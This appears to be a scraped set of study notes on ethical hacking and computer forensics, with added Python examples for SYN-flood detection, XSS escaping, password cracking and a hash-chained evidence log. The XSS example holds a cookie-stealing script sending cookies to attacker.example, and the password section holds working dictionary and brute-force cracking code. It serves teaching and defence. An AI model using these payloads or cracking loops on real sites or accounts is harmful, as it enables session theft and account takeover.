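        recs.append(Rec(0.1 + i * 0.01, f"192.168.1.{i + 10}", "10.0.0.20", 80, SYN))
        recs.append(Rec(0.2 + i * 0.01, f"192.168.1.{i + 10}", "10.0.0.20", 80, ACK))
    for i in range(300):
        recs.append(Rec(1.0 + i * 0.002, f"203.0.113.{i % 250 + 1}", "10.0.0.20", 80, SYN))
    for i in range(5):
        recs.append(Rec(1.0 + i * 0.1, f"192.168.1.{i + 10}", "10.0.0.21", 443, SYN))
        recs.append(Rec(1.05 + i * 0.1, f"192.168.1.{i + 10}", "10.0.0.21", 443, ACK))
    return recs


if __name__ == "__main__":
    for service, stats in syn_flood_report(sample_records()).items():
        print(service, stats)
```

The source count in the report is the second signal worth alerting on: a legitimate burst comes from a bounded set of clients, while a flood with spoofed addresses shows a source set nearly as large as the SYN count. On the server side, the TCP-stack tweak the text alludes to is SYN cookies, which let the kernel avoid keeping state for a half-open connection until the third packet arrives.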
8. How ‘crunch’ and ‘Hydra’ related to ethical hacking?
Hydra is a network login cracker: given a wordlist and a target service, it
tries the candidate passwords against the login. It has a fairly complex
syntax for attacking web applications, so the syntax has to be studied
first.
This is the program used to launch the attack. Hydra comes pre-installed in
all versions of Kali Linux, so you don’t need to do anything fancy; just
launch it from the command line by typing hydra.
Crunch is a wordlist generator in which you can specify a standard
character set or a custom character set. Crunch can generate all possible
combinations and permutations, which makes it a natural source of
candidate passwords for Hydra. This tool comes bundled with the Kali
distribution of Linux.
9. What is ‘XSS’?
Cross site Scripting (XSS): This attack involves placing a malicious link in
a plausible place; the link points to a normal website with a valid URL but
carries a dangerous script in its parameters. An unsuspecting visitor trusts
the site they are on and has no idea the page contains malicious activity.
In other words, XSS enables attackers to inject client-side scripts into
web pages by exploiting flaws in dynamically generated web pages. An
attacker can execute malicious scripts (also commonly referred to as a
malicious payload) in the context of a legitimate website or web
application and cause various damage, including data theft, session
hijacking, redirecting the web page to another website, etc.
The goal of an XSS attack is always to execute malicious JavaScript in the
victim’s browser; there are a few fundamentally different ways of achieving
that goal. XSS attacks are often divided into three types:
 Persistent (stored) XSS, where the malicious string originates from the
website’s database.
 Reflected XSS, where the malicious string originates from the victim’s
request.
 DOM-based XSS, where the vulnerability is in the client-side code rather than
the server-side code.
 Reflected XSS: The attacker gets the victim to send a script as input
(typically through a crafted link), and the server reflects that input back
to the victim in its response. The attacker can craft scripts that steal
session cookies, redirect to a malicious web page, inject data into the page,
perform actions on the site as the victim, and much more.
Stored XSS: This attack is riskier and does more damage.
In this type of attack, the malicious code or script is saved on the web
server (for example, in the database) and executed every time a user calls
the affected functionality. In this way a stored XSS attack can affect many
users, and because the script is stored on the web server it affects the
website for a longer time.
DOM-based XSS: This type of attack occurs when the DOM environment is
changed by the page’s own client-side code using attacker-controlled data
(such as part of the URL), while the server’s response itself does not
change. When the DOM environment is modified in the victim’s browser, the
client-side code executes differently.
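Added example, not code from these notes, for the reflected case above: a vulnerable echo template beside escaping for the three contexts user text usually lands in (HTML body, attribute value, inline script). The cookie-stealing payload, the attribute-breaking payload and the attacker host name are constructed for the demonstration.

```python
# Reflected XSS: a template that echoes input unescaped beside context-aware escaping
# for the three places user text usually lands (HTML body, attribute value, inline
# script). Added example, not from these notes; the payloads are constructed.
import html
import json

# What a reflected-XSS link carries in its query string (constructed payload).
COOKIE_THIEF = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(query: str) -> str:
    """Echoes the search term straight into the page; markup in it becomes part of the DOM."""
    return f"<p>Results for: {query}</p>"


def render_escaped(query: str) -> str:
    """HTML body context: < > & \" ' become entities, so the browser shows text, not a tag."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_attribute(query: str) -> str:
    """Attribute context: the value is quoted and escaped, so a payload cannot close the
    attribute and start an on* handler of its own."""
    return f'<input type="text" name="q" value="{html.escape(query, quote=True)}">'


def render_into_script(query: str) -> str:
    """JavaScript context: HTML escaping is the wrong tool here. Serialise as a JSON
    string literal and escape '<' so that '</script>' inside the value cannot end the block."""
    literal = json.dumps(query).replace("<", "\\u003c")
    return f"<script>var q = {literal};</script>"


if __name__ == "__main__":
    print(render_vulnerable(COOKIE_THIEF))
    print(render_escaped(COOKIE_THIEF))
    print(render_attribute('" onfocus="alert(1)" autofocus="'))
    print(render_into_script('</script><script>alert(1)</script>'))
```

The point of the three escaping functions is that there is no single "escape" that is right everywhere: the browser decodes entities in a body or attribute but not inside a script block, where the HTML parser ends the block at the first `</script>` regardless of JavaScript quoting. Escaping at output time for the context the value lands in, not filtering at input time, is what closes the reflected and stored cases; DOM-based XSS needs the same discipline applied in the client-side code.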
10. Explain the methods of password hacking?
One should always take care to use a strong password to defend one’s
accounts from potential attackers. A strong password has the following
attributes:
 Contains at least 8 characters.
 A mix of letters, numbers and special characters.
 A combination of small and capital letters.
The main methods of password hacking are:
 Dictionary attack: The attacker uses a predefined list of words from a
dictionary and tries each one as the password. If the password is weak, a
dictionary attack can crack it fast.
 Hybrid dictionary attack: Uses a set of dictionary words combined with
extensions (appended digits, years, symbols and the like). Crunch is a
wordlist generator in which you can specify a standard character set; it
can generate all possible combinations and permutations of the characters.
 Brute force attack: The attacker tries all possible combinations of
letters, numbers, special characters and small and capital letters to break
the password. This type of attack is certain to succeed eventually, but it
requires an enormous amount of time to process all the combinations, and the
time grows exponentially with the password length.
 Phishing attack: There’s an easier way: ask the user for his or her
password. A phishing e-mail leads the unsuspecting reader to a fake login
page imitating whatever service the attacker wants to access, requesting the
user to put right some terrible problem with their security. That page then
skims the password and the attacker can use it for their own purposes.
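Added example, not code from these notes, for the dictionary, hybrid and brute-force attacks described here and in question 4(d), and for the crunch-style wordlist generation mentioned in question 8: each attack is run against a salted SHA-256 hash of the kind an attacker might have stolen. The salt, the wordlist, the hybrid rule set and the hashing scheme are constructed assumptions.

```python
# Dictionary, hybrid and brute-force attacks against a stolen password hash, in the
# style of a crunch-generated wordlist fed to a cracker. Added example, not from these
# notes: the hashing scheme (one SHA-256 round over salt+password) is an assumption
# chosen so the demo finishes quickly; real systems should use a slow KDF such as
# bcrypt, scrypt or Argon2 precisely so that these loops become expensive.
import hashlib
import itertools
import string
from typing import Iterable, Iterator, Optional

SALT = b"constructed-salt"                        # assumed per-user salt from the stolen record
CHARSET = string.ascii_lowercase + string.digits  # crunch-style character set
WORDLIST = ["password", "letmein", "dragon", "summer", "welcome"]  # constructed mini dictionary


def hash_pw(password: str) -> str:
    return hashlib.sha256(SALT + password.encode()).hexdigest()


def dictionary_attack(target: str, candidates: Iterable[str]) -> Optional[str]:
    """Plain dictionary attack: hash each candidate and compare with the stolen hash."""
    for cand in candidates:
        if hash_pw(cand) == target:
            return cand
    return None


def hybrid_candidates(words: Iterable[str]) -> Iterator[str]:
    """Hybrid attack: dictionary words plus the 'extensions' people really use
    (capitalisation, a trailing digit, '!', '123', a year). The rule set is an assumption."""
    suffixes = [str(d) for d in range(10)] + ["!", "123", "2024"]
    for w in words:
        for base in (w, w.capitalize(), w.upper()):
            yield base
            for s in suffixes:
                yield base + s


def brute_force(target: str, charset: str = CHARSET, max_len: int = 3) -> Optional[str]:
    """Exhaustive search, crunch style: every string over `charset` up to `max_len`.
    The cost is len(charset)**n per length, which is why a long random password
    is out of reach while a short one falls in seconds."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(charset, repeat=n):
            cand = "".join(tup)
            if hash_pw(cand) == target:
                return cand
    return None


def search_space(charset: str, max_len: int) -> int:
    """Number of candidates brute_force may have to try."""
    return sum(len(charset) ** n for n in range(1, max_len + 1))


if __name__ == "__main__":
    print(dictionary_attack(hash_pw("dragon"), WORDLIST))
    print(dictionary_attack(hash_pw("Summer2024"), WORDLIST))
    print(dictionary_attack(hash_pw("Summer2024"), hybrid_candidates(WORDLIST)))
    print(brute_force(hash_pw("az9")), search_space(CHARSET, 3))
```

The same `dictionary_attack` loop serves all three attacks; only the candidate source changes (a word list, the word list with rules applied, or an exhaustive generator like crunch's), which is also how tools such as Hydra consume the wordlists crunch produces. `search_space` makes the "enormous time" remark concrete: 36 characters at length 3 is under 50,000 candidates, while 95 printable characters at length 12 is about 5.4e23.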
46

More Related Content

PPT
Introduction to computer forensic
PPT
iConference Popovsky
PPTX
How to Build a Successful Incident Response Program
PDF
PPTX
'Conducing Security Investigations' Webinar 1-17-2012
PDF
Chfi V3 Module 01 Computer Forensics In Todays World
PPTX
Purple Teaming - The Collaborative Future of Penetration Testing
PPT
Computer forensics
Introduction to computer forensic
iConference Popovsky
How to Build a Successful Incident Response Program
'Conducing Security Investigations' Webinar 1-17-2012
Chfi V3 Module 01 Computer Forensics In Todays World
Purple Teaming - The Collaborative Future of Penetration Testing
Computer forensics

What's hot (19)

PPT
After the Breach
PPTX
Digital forensics
PDF
Codec Networks Providing Courses in Cyber forensic,Network Forensics.
PPTX
Slide Deck – Session 2 – FRSecure CISSP Mentor Program 2017
PPTX
Slide Deck – Session 3 – FRSecure CISSP Mentor Program 2017
PPTX
Network and computer forensics
PPTX
Behind The Firewall In-House E Disco Final
PPSX
Everything you need to implement a data forensics program
PPTX
Slide Deck – Session 4 – FRSecure CISSP Mentor Program 2017
PDF
Focusing on the Threats to the Detriment of the Vulnerabilities
PPTX
Case study on Physical devices used in Computer forensics.
PPTX
Understanding advanced persistent threats (APT)
PPTX
Slide Deck – Class Session 1 – FRSecure CISSP Mentor Program
PPTX
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
PDF
6528 opensource intelligence as the new introduction in the graduate cybersec...
PPTX
Computer forensic
PDF
12-19-14 CLE for South (P Garrett)
PPTX
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
PDF
Slide Deck - CISSP Mentor Program Class Session 1
After the Breach
Digital forensics
Codec Networks Providing Courses in Cyber forensic,Network Forensics.
Slide Deck – Session 2 – FRSecure CISSP Mentor Program 2017
Slide Deck – Session 3 – FRSecure CISSP Mentor Program 2017
Network and computer forensics
Behind The Firewall In-House E Disco Final
Everything you need to implement a data forensics program
Slide Deck – Session 4 – FRSecure CISSP Mentor Program 2017
Focusing on the Threats to the Detriment of the Vulnerabilities
Case study on Physical devices used in Computer forensics.
Understanding advanced persistent threats (APT)
Slide Deck – Class Session 1 – FRSecure CISSP Mentor Program
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
6528 opensource intelligence as the new introduction in the graduate cybersec...
Computer forensic
12-19-14 CLE for South (P Garrett)
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
Slide Deck - CISSP Mentor Program Class Session 1

Similar to Ethical Hacking And Computer Forensics (20)

PPTX
Cyber
PPTX
Introduction to computer forensics in IT society
PPT
Cyber forensics
PPTX
Cyber forensic-Evedidence collection tools
PPT
computer forensics, involves the preservation, identification, extraction, an...
PDF
A Review on Recovering and Examining Computer Forensic Evidences
PPTX
Chapter 3 cmp forensic
PDF
Cyber forensics and auditing
PPTX
PPT
Lecture 9 and 10 comp forensics 09 10-18 file system
PPTX
unit 5 understanding computer forensics.pptx
PPTX
computer-forensics-8727-OHvDvOm.pptx
PPTX
computer-forensics-8727-OHvDvOm.pptx
PDF
Ethical Hacking And Computer Forensics

3. Describe in detail the services offered by computer forensics?
The services offered by computer forensics include the following:
 Forensic incident response
 Evidence collection
 Forensic analysis
 Expert witness
 Forensic litigation and insurance claims support
 Training
 Forensic process improvement
i. Forensic incident response: Forensics and incident response are an important part of business and law enforcement operations.
ii. Evidence collection: This covers memory dumps, network status, process dumps, other system information and disk images; forensic analysis is done on the images, not on the original disk.
iii. Forensic analysis: Forensic analysis is a term for an in-depth analysis or investigation whose purpose is to objectively identify and document the culprits, reasons, course and consequences of a security incident or of a violation of state laws or rules of the organization.
iv. Expert witness: An expert witness, particularly in common law countries such as the United Kingdom, Australia, and the United States, is a person whose opinion, by virtue of education, training, certification, skills or experience, is accepted by the judge as an expert.
v. Forensic process improvement: The purpose of this part of the chapter is to introduce the reader to a process that will enable a system administrator or information security analyst to determine the threat against their systems and networks.
4. What are the rules for evidence collection?
There are five rules of collecting electronic evidence. These relate to five properties that evidence must have to be useful:
 Admissible
 Authentic
 Complete
 Reliable
 Believable
a. Admissible: Admissibility is the most basic rule. The evidence must be able to be used in court or otherwise. Failure to comply with this rule is equivalent to not collecting the evidence in the first place, except that the cost is higher.
b. Authentic: If you can’t tie the evidence positively to the incident, you can’t use it to prove anything.
c. Complete: It’s not enough to collect evidence that just shows one perspective of the incident.
d. Reliable: The evidence you collect must be reliable. Your evidence collection and analysis procedures must not cast doubt on the evidence’s authenticity and veracity.
e. Believable: The evidence you present should be clearly understandable and believable to a jury.
5. What is the internet security hierarchy?
Information such as trade secrets, vault and authorization codes, and lock and key information is clearly of a mission-critical nature, and its unintended disclosure could cause severe loss to a business or operation.
Fig: Internet security hierarchy (levels shown in the figure: mission critical, departmental private, company private, public information)
6. What are the different types of evidence?
a. Testimonial Evidence: Testimonial evidence is any evidence supplied by a witness. This type of evidence is subject to the perceived reliability of the witness, but as long as the witness can be considered reliable, testimonial evidence can be almost as powerful as real evidence.
b. Hearsay: Hearsay is any evidence presented by a person who was not a direct witness. Word processor documents written by someone without direct knowledge of the incident are hearsay. Hearsay is generally inadmissible in court and should be avoided.
c. Real Evidence: Real evidence is any evidence that speaks for itself without relying on anything else. In electronic terms, this can be a log produced by an audit function—provided that the log can be shown to be free from contamination.
7. Discuss the role of artifacts in computer forensics?
There is almost always something left behind by the attacker—be it code programs, running processes, or sniffer log files. These are known as artifacts.
Never attempt to analyze an artifact on the compromised system. Artifacts are capable of anything, and you want to make sure their effects are controlled.
8. Compare spyware and adware?
Spyware: Spyware is computer software which is installed surreptitiously on a personal computer; it takes partial control over the user’s computer without the user’s informed consent.
Adware: Adware is any software package which automatically plays, displays, or downloads advertisements to a computer after the software is installed on it or while the application is being used.
Both are independent programs that can be installed automatically when you surf the internet or when you install free software. Most adware is spyware in a different sense than “advertising supported software,” and for a different reason: it displays advertisements related to what it finds by spying on you.
9. What are the different steps in evidence collection?
 Find the evidence.
 Find the relevant data.
 Create an order of volatility.
 Remove external avenues of change.
 Collect the evidence.
 Document everything.
a. Find the Evidence: Determine where the evidence you are looking for is stored. Use a checklist. Not only does it help you to collect evidence, but it can also be used to double-check that everything you are looking for is there.
b. Find the Relevant Data: Once you’ve found the evidence, you must figure out what part of it is relevant to the case. In general, you should err on the side of over-collection, but you must remember that you have to work fast. Don’t spend hours collecting information that is obviously useless.
c. Create an Order of Volatility: Now that you know exactly what to gather, work out the best order in which to gather it. The order of volatility for your system is a good guide and ensures that you minimize the loss of uncorrupted evidence.
d. Remove External Avenues of Change: It is essential that you avoid alterations to the original data, and prevention is always better than cure. Preventing anyone from tampering with the evidence helps you create as exact an image as possible.
e. Collect the Evidence: You can now start to collect the evidence using the appropriate tools for the job. Re-evaluate the evidence you’ve already collected; you may find that you missed something important. Now is the time to make sure you get it.
f. Document Everything: Your collection procedures may be questioned later, so it is important that you document everything you do. Timestamps, digital signatures, and signed statements are all important. Don’t leave anything out.
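Steps c, d and f above (collecting in order of volatility, keeping the evidence free from later change, and documenting everything with timestamps) as one worked example. This is added code, not part of the original notes: it keeps a collection log in which every record stores the SHA-256 of the artifact it describes plus a digest chained to the previous record, so a later edit to the log or to a stored artifact is detectable. The hash chain is a keyless stand-in for the digital signatures the notes mention; the artifact contents, the source names and the collector id are constructed sample values.

```python
"""Evidence collection log with integrity chaining (added example).

Assumptions, not from the original notes: each collected artifact is handed
in as bytes; a record stores its SHA-256, a timestamp and the collector, and
every record also carries a digest over its own fields plus the previous
record's digest, so altering, dropping or reordering a record breaks the chain.
"""
import hashlib
import json
from datetime import datetime, timezone
from typing import Optional

# Order of volatility from the notes (most volatile first).
VOLATILITY_ORDER = [
    "registers and cache", "routing tables", "arp cache", "process table",
    "kernel statistics and modules", "main memory", "temporary file systems",
    "secondary memory", "router configuration", "network topology",
]
GENESIS = "0" * 64  # "previous digest" of the first record


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _record_digest(fields: dict) -> str:
    # Canonical JSON so the digest does not depend on dict ordering.
    return sha256_hex(json.dumps(fields, sort_keys=True, separators=(",", ":")).encode())


def add_record(log: list, source: str, artifact: bytes, collector: str,
               when: Optional[datetime] = None) -> dict:
    """Append one record for a collected artifact and return it."""
    when = when or datetime.now(timezone.utc)
    fields = {
        "seq": len(log) + 1,
        "timestamp": when.isoformat(),
        "source": source,
        "size": len(artifact),
        "sha256": sha256_hex(artifact),
        "collector": collector,
        "prev": log[-1]["chain"] if log else GENESIS,
    }
    record = dict(fields, chain=_record_digest(fields))
    log.append(record)
    return record


def verify_log(log: list) -> bool:
    """Recompute every link; False if any record was edited, removed or reordered."""
    prev = GENESIS
    for i, record in enumerate(log, start=1):
        fields = {k: v for k, v in record.items() if k != "chain"}
        if record["seq"] != i or fields["prev"] != prev:
            return False
        if _record_digest(fields) != record["chain"]:
            return False
        prev = record["chain"]
    return True


def artifact_matches(record: dict, artifact: bytes) -> bool:
    """Check later that a stored artifact is still the one that was collected."""
    return record["sha256"] == sha256_hex(artifact) and record["size"] == len(artifact)


def collect_by_volatility(log: list, artifacts: dict, collector: str) -> list:
    """Record artifacts in the notes' order of volatility; unknown sources go last."""
    def rank(source: str) -> int:
        key = source.lower()
        return VOLATILITY_ORDER.index(key) if key in VOLATILITY_ORDER else len(VOLATILITY_ORDER)
    return [add_record(log, src, artifacts[src], collector) for src in sorted(artifacts, key=rank)]


def demo() -> list:
    # Constructed sample artifacts standing in for command output captured on a host.
    artifacts = {
        "main memory": b"<constructed memory dump placeholder>",
        "process table": b"PID 1 init\nPID 412 sshd\nPID 977 unknown_svc\n",
        "routing tables": b"default via 10.0.0.1 dev eth0\n",
    }
    log = []
    collect_by_volatility(log, artifacts, collector="analyst-01")
    return log
```

`demo()` returns the log with the routing table recorded before the process table and the memory dump, following the order of volatility; `verify_log()` run over a log whose middle record has been edited, or from which a record has been dropped, returns False.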
Part B
1. Explain the types of computer forensics systems?
 Data seizure
 Data duplication and preservation
 Data recovery
 Document searches
 Media conversion
 Expert witness services
 Computer evidence service options
 Other miscellaneous services
a. Data Seizure: Computer forensics experts, following federal guidelines, should act as this representative, using their knowledge of data storage technologies to track down evidence. Experts should also be able to assist during the equipment seizure process.
b. Data Duplication and Preservation: When one party must seize data from another, two concerns must be addressed:
 the data must not be altered in any way;
 the seizure must not put an undue burden on the responding party.
Computer forensics experts should address both of these concerns by making an exact duplicate of the needed data. When experts work on the duplicated data, the integrity of the original data is maintained.
c. Data Recovery: Data recovery is the process in which highly trained engineers evaluate and extract data from damaged media and return it in an intact format. Using proprietary tools, computer forensics experts should be able to safely recover and analyze otherwise inaccessible evidence. The ability to recover lost evidence is made possible by the expert’s advanced understanding of storage technologies.
d. Document Searches: Computer forensics experts should also be able to search over 200,000 electronic documents in seconds rather than hours. The speed and efficiency of these searches make the discovery process less complicated and less intrusive to all parties involved.
e. Media Conversion: Computer forensics experts should extract the relevant data from these devices, convert it into readable formats, and place it onto new storage media for analysis.
f. Expert Witness Services: Computer forensics experts should be able to explain complex technical processes in an easy-to-understand fashion. This should help judges and juries comprehend how computer evidence is found, what it consists of, and how it is relevant to a specific situation.
g. Computer Evidence Service Options: Computer forensics experts should offer various levels of service, each designed to suit your individual investigative needs:
 Standard service
 On-site service
 Emergency service
 Priority service
 Weekend service
i. Standard Service: Computer forensics experts should be able to work on your case during normal business hours until the critical electronic evidence is found.
ii. On-Site Service: Computer forensics experts should be able to travel to your location to perform complete computer evidence services. While on-site, the experts should quickly be able to produce exact duplicates of the data storage media in question.
iii. Emergency Service: Your computer forensics experts should be able to give your case the highest priority in their laboratories. They should be able to work on it without interruption until your evidence objectives are met.
iv. Priority Service: Dedicated computer forensics experts should be able to work during normal business hours (8:00 A.M. to 5:00 P.M., Monday through Friday) until the evidence is found. Priority service typically cuts your turnaround time in half.
v. Weekend Service: Computer forensics experts should be able to work from 8:00 A.M. to 5:00 P.M., Saturday and Sunday, to locate the needed electronic evidence, and will continue working on your case until your evidence objectives are met. Weekend service depends on the availability of computer forensics experts.
h. Other Miscellaneous Services: Computer forensics experts should also be able to provide extended services. These services include:
 Analysis of computers and data in criminal investigations
 On-site seizure of computer data in criminal investigations
 Analysis of computers and data in civil litigation
 On-site seizure of computer data in civil litigation
 Analysis of company computers to determine employee activity
 Assistance in preparing electronic discovery requests
 Reporting in a comprehensive and readily understandable manner
 Court-recognized computer expert witness testimony
 Computer forensics on both PC and Mac platforms
 Fast turnaround time
2. Explain the data recovery process?
Data recovery is the process in which highly trained engineers evaluate and extract data from damaged media and return it in an intact format. Many people, even computer experts, fail to recognize data recovery as an option during a data crisis, yet it is possible to retrieve files that have been deleted and passwords that have been forgotten, or to recover entire hard drives that have been physically damaged.
Data Back-up and Recovery
a. Back-up Obstacles: The following are obstacles to backing up applications:
 Backup window
 Network bandwidth
 System throughput
 Lack of resources
i. Back-up Window: The backup window is the period of time when backups can be run. The backup window is generally timed to occur during non-production periods when network bandwidth and CPU utilization are low.
ii. Network Bandwidth: If a network cannot handle the impact of transporting hundreds of gigabytes of data over a short period of time, the organization’s centralized backup strategy is not viable.
iii. System Throughput: Three I/O bottlenecks are commonly found in traditional backup schemes. These are:
1. The ability of the system being backed up to push data to the backup server.
2. The ability of the backup server to accept data from multiple systems simultaneously.
3. The available throughput of the tape device(s) onto which the data is moved.
iv. Lack of Resources: Many companies fail to make appropriate investments in data protection until it is too late.
b. The Future of Data Back-up: Successful data backup and recovery is composed of four key elements: the backup server, the network, the backup window, and the backup storage device.
a. The Back-up Server: The backup server is responsible for managing the policies, schedules, media catalogs, and indexes associated with the systems it is configured to back up. The systems being backed up are called clients. The overall performance of a backup or recovery is directly related to the ability of the backup server to handle the I/O load created by the backup process.
Tape servers allow administrators to divide the backup tasks across multiple systems while maintaining scheduling and administrative processes on a primary or backup server. This approach often involves attaching multiple tape servers to a shared tape library, which reduces the overall cost of the system.
The newest backup architecture implements a serverless backup solution that allows data to be moved directly from disk to tape, bypassing the backup server altogether. This method of data backup removes the bottleneck of the backup server completely. However, the performance of serverless backup is then affected by another potential bottleneck—bandwidth.
b. The Network Data Path: Centralization of a data-management process such as backup and recovery requires a robust and available network data path. The movement and management of hundreds or thousands of megabytes of data can put a strain on even the best-designed networks. An enterprise-class backup solution can distribute backup services directly to the data source while at the same time centralizing the administration of these resources.
c. The Back-up Window: A backup window defines how much time is available to back up the network. Time plays an important role in choosing how much server, network, and resource support needs to be deployed.
 Incremental Back-up: Incremental backups only transfer data that has changed since the last backup. On average, no more than 5% of the data in a file server changes daily. That means an incremental backup may only require 5% of the time it takes to back up the entire file system.
 Block-Level Incremental Back-up: Rather than backing up entire files that have been modified since the last backup, only the blocks that have changed since the last backup are marked for backup.
 Image Back-up: This type of backup creates copies, or snapshots, of a file system at a particular point in time. Image backups are much faster than incremental backups and provide the ability to easily perform a bare-bones recovery of a server without loading the operating system, applications, and the like.
 Data Archiving: Removing infrequently accessed data from a disk drive can reduce the size of a scheduled backup by up to 80%.
 Back-up Storage Device: The single most expensive item in a backup project is the backup storage device itself. Determining the tape format, number of tape drives, and how many slots are required is predicated on many variables. Backup windows, growth rates, retention policies, duplicate tape copies, and network and server throughputs all affect which backup storage device is best for your needs.
 Recommended Back-up Features:
1. Data Interleaving: To back up multiple systems concurrently, the backup application must be able to write data from multiple clients to tape in an interleaved manner.
2. Remote Back-up: Many remote systems are exposed to unrecoverable data loss.
3. Global Monitoring: A robust backup application should be able to support reporting and administration of any backup system, regardless of location.
4. Performance: An enterprise backup application should be able to benchmark backup data rates exceeding one terabyte per hour.
3. What are the different computer forensics system technologies?
a. Types of Military Computer Forensics Technology
 Key objectives of cyber forensics include rapid discovery of evidence, estimation of the potential impact of the malicious activity on the victim, and assessment of the intent and identity of the perpetrator.
 Real-time tracking of potentially malicious activity is especially difficult when the pertinent information has been intentionally hidden, destroyed, or modified in order to elude discovery.
 The National Law Enforcement and Corrections Technology Center (NLECTC) works with criminal justice professionals to identify urgent and emerging technology needs.
 NLECTC centers demonstrate technologies, test commercially available technologies and publish results linking research and practice.
Computer Forensic Experiment-2000 (CFX-2000)
 CFX-2000 is an integrated forensic analysis framework.
 The central hypothesis of CFX-2000 is that it is possible to accurately determine the motives, intent, targets, sophistication, identity, and location of cyber criminals and cyber terrorists by deploying an integrated forensic analysis framework.
 The cyber forensic tools involved in CFX-2000 consisted of commercial off-the-shelf software and directorate-sponsored R&D prototypes. CFX includes the SI-FI integration environment.
 The Synthesizing Information from Forensics Investigations (SI-FI) integration environment supports the collection, examination, and analysis processes employed during a cyber-forensic investigation.
 The SI-FI prototype uses digital evidence bags (DEBs), which are secure and tamperproof containers used to store digital evidence. Investigators can seal evidence in the DEBs and use the SI-FI implementation to collaborate on complex investigations.
b. Types of Law Enforcement Computer Forensics Technology
 Computer forensics tools and techniques have become important resources for use in internal investigations, civil lawsuits, and computer security risk management. Law enforcement and military agencies have been involved in processing computer evidence for years.
Computer Evidence Processing Procedures
Processing procedures and methodologies should conform to federal computer evidence processing standards.
 Preservation of Evidence: Computer evidence is fragile and susceptible to alteration or erasure by any number of occurrences.
i. Trojan Horse Programs: The computer expert should be able to demonstrate his or her ability to avoid destructive programs and traps that can be planted by computer users bent on destroying data and evidence. Such programs can also be used to covertly capture sensitive information, passwords, and network logons.
ii. Computer Forensics Documentation: Without proper documentation, it is difficult to present findings. If the security or audit findings become the object of a lawsuit or a criminal investigation, then documentation becomes even more important.
iii. File Slack: Techniques and automated tools that are used to capture and evaluate file slack should be demonstrated in a training course.
iv. Data Hiding Techniques: The participants should be able to demonstrate their ability to deal with slack and should demonstrate proficiency in searching file slack, documenting their findings, and eliminating the security risk.
v. E-commerce Investigations:
a. Net Threat Analyzer: Can be used to identify past Internet browsing and email activity done through specific computers.
b. Dual Purpose Programs: Programs can be designed to perform multiple processes and tasks at the same time.
c. Text Search Techniques: Tools that can be used to find targeted strings of text in files, file slack, unallocated file space, and Windows swap files.
 Data Structure: Participants should be able to leave a training course with a good understanding of how computer hard disks and floppy diskettes are structured and how computer evidence can reside at various levels within the structure of the disk.
 Data Encryption: A computer forensics course should cover, in general, how data is encrypted; it should also illustrate the differences between good encryption and bad encryption.
 Matching a Diskette to a Computer: Specialized techniques and tools make it possible to conclusively tie a diskette to a computer that was used to create or edit files stored on it.
 Data Compression: The participant should be shown how compression works and how compression programs can be used to hide and disguise sensitive data.
 Erased Files: The training participant should be shown how previously erased files can be recovered by using DOS programs and by manually using data-recovery techniques.
 Internet Abuse Identification and Detection: This process focuses on computer forensics issues tied to data that the computer user probably doesn’t realize exists (file slack, unallocated file space, and Windows swap files).
 The Boot Process and Memory Resident Programs: The participant should be able to take part in a graphic demonstration of how the operating system can be modified to change data and destroy data at the whim of the person who configured the system.
c. Types of Business Computer Forensics Technology
 Remote Monitoring of Target Computer: Data Interception by Remote Transmission (DIRT) from Codex Data Systems (CDS), Inc. [7] is a powerful remote control monitoring tool that allows stealth monitoring of all activity on one or more target computers simultaneously from a remote command center.
 Creating Trackable Electronic Documents:
 Theft Recovery Software for Laptops and PCs: What is the real cost of a stolen laptop or PC?
i. The price of the replacement hardware.
ii. The price of replacing the software.
iii. The cost of lost production time or instruction time.
iv. The loss of customer goodwill (lost faxes, delayed correspondence or billings, problems answering questions and accessing data).
v. The cost of reporting and investigating the theft, filing police reports and insurance claims.
vi. The cost of increased insurance.
Basic Forensics Tools and Techniques
 Many computer forensics workshops have been created to familiarize investigators and security personnel with the basic techniques and tools necessary for a successful investigation of Internet and computer-related crimes.
 Workshop topics normally include: types of computer crime, cyber law basics, tracing email to its source, digital evidence acquisition, cracking passwords, monitoring computers remotely, tracking online activity, finding and recovering hidden and deleted data, locating stolen computers, creating trackable files, identifying software pirates, and so on.
Forensics Services Available
 Lost password and file recovery
 Location and retrieval of deleted and hidden files
 File and email decryption
 Email supervision and authentication
 Threatening email traced to source
 Identification of Internet activity
 Computer usage policy and supervision
 Remote PC and network monitoring
 Tracking and location of stolen electronic files
 Honey pot sting operations
 Location and identity of unauthorized software users
 Theft recovery software for laptops and PCs
 Investigative and security software creation
 Protection from hackers and viruses (see sidebar, “Virus/Trojan/Worm Protection”).
4. Describe in detail the evidence processing steps?
There really are no strict rules that must be followed regarding the processing of computer evidence. The following are general computer forensics steps:
 Shut down the computer.
 Document the hardware configuration of the system.
 Transport the computer system to a secure location.
 Make bit stream backups of hard disks and floppy disks.
 Mathematically authenticate data on all storage devices.
 Document the system date and time.
 Make a list of key search words.
 Evaluate the Windows swap file.
 Evaluate file slack.
 Evaluate unallocated space (erased files).
 Search files, file slack, and unallocated space for keywords.
 Document file names, dates, and times.
 Identify file, program, and storage anomalies.
 Evaluate program functionality.
 Document your findings.
 Retain copies of software used.
a. Shut down the computer: Depending on the computer operating system, this usually involves pulling the plug or shutting down a network computer using the relevant commands required by the network involved. Generally, time is of the essence, and the computer system should be shut down as quickly as possible.
b. Document the hardware configuration of the system: Before dismantling the computer, it is important that pictures are taken of the computer from all angles to document the system hardware components and how they are connected. Labeling each wire is also important, so that it can easily be reconnected when the system configuration is restored to its original condition at a secure location.
c. Transport the computer system to a secure location: A seized computer left unattended can easily be compromised. Don’t leave the computer unattended unless it is locked up in a secure location.
d. Make bit stream backups of hard disks and floppy disks: All evidence processing should be done on a restored copy of the bit stream backup rather than on the original computer. Bit stream backups are much like an insurance policy and are essential for any serious computer evidence processing.
e. Mathematically authenticate data on all storage devices: You want to be able to prove that you did not alter any of the evidence after the computer came into your possession. Since 1989, law enforcement and military agencies have used a 32-bit mathematical process to do the authentication process.
